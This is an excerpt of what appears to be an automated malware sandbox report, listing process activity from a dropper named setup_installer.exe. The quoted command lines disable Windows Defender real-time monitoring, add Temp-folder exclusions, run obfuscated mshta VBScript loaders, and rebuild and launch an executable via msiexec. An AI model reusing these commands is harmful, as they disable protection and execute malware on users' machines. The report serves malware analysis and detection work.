Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3984 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe
PID 3984 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe
PID 3984 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe
PID 3228 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1940 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4012 wrote to memory of 1900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4012 wrote to memory of 1900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4012 wrote to memory of 1900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3228 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2424 wrote to memory of 1836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe
PID 2424 wrote to memory of 1836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe
PID 2424 wrote to memory of 1836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe
PID 2288 wrote to memory of 4980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe

Tue19c06f159e0ec.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3228 -ip 3228

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe

Tue1993b3f72c.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe

Tue193858933525b62.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19150ee2be694c8a4.exe

Tue19150ee2be694c8a4.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe

Tue19879c4c0e.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19325eb008c0b950.exe

Tue19325eb008c0b950.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue192762f1cd058ddf8.exe

Tue192762f1cd058ddf8.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe

Tue19c1338f41ab.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe

Tue19411ac950924ec3f.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe

Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1969586bcbf58493.exe

Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe

Tue19b4ef3b53293fe.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe

Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 620

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe

Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c78ded4d176ac.exe

Tue19c78ded4d176ac.exe

C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp" /SL5="$100030,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe

"C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp" /SL5="$70110,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2852 -ip 2852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 360

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue193858933525b62.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaddeccc40,0x7ffaddeccc4c,0x7ffaddeccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2272 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3296,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4580,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4976,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3728 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

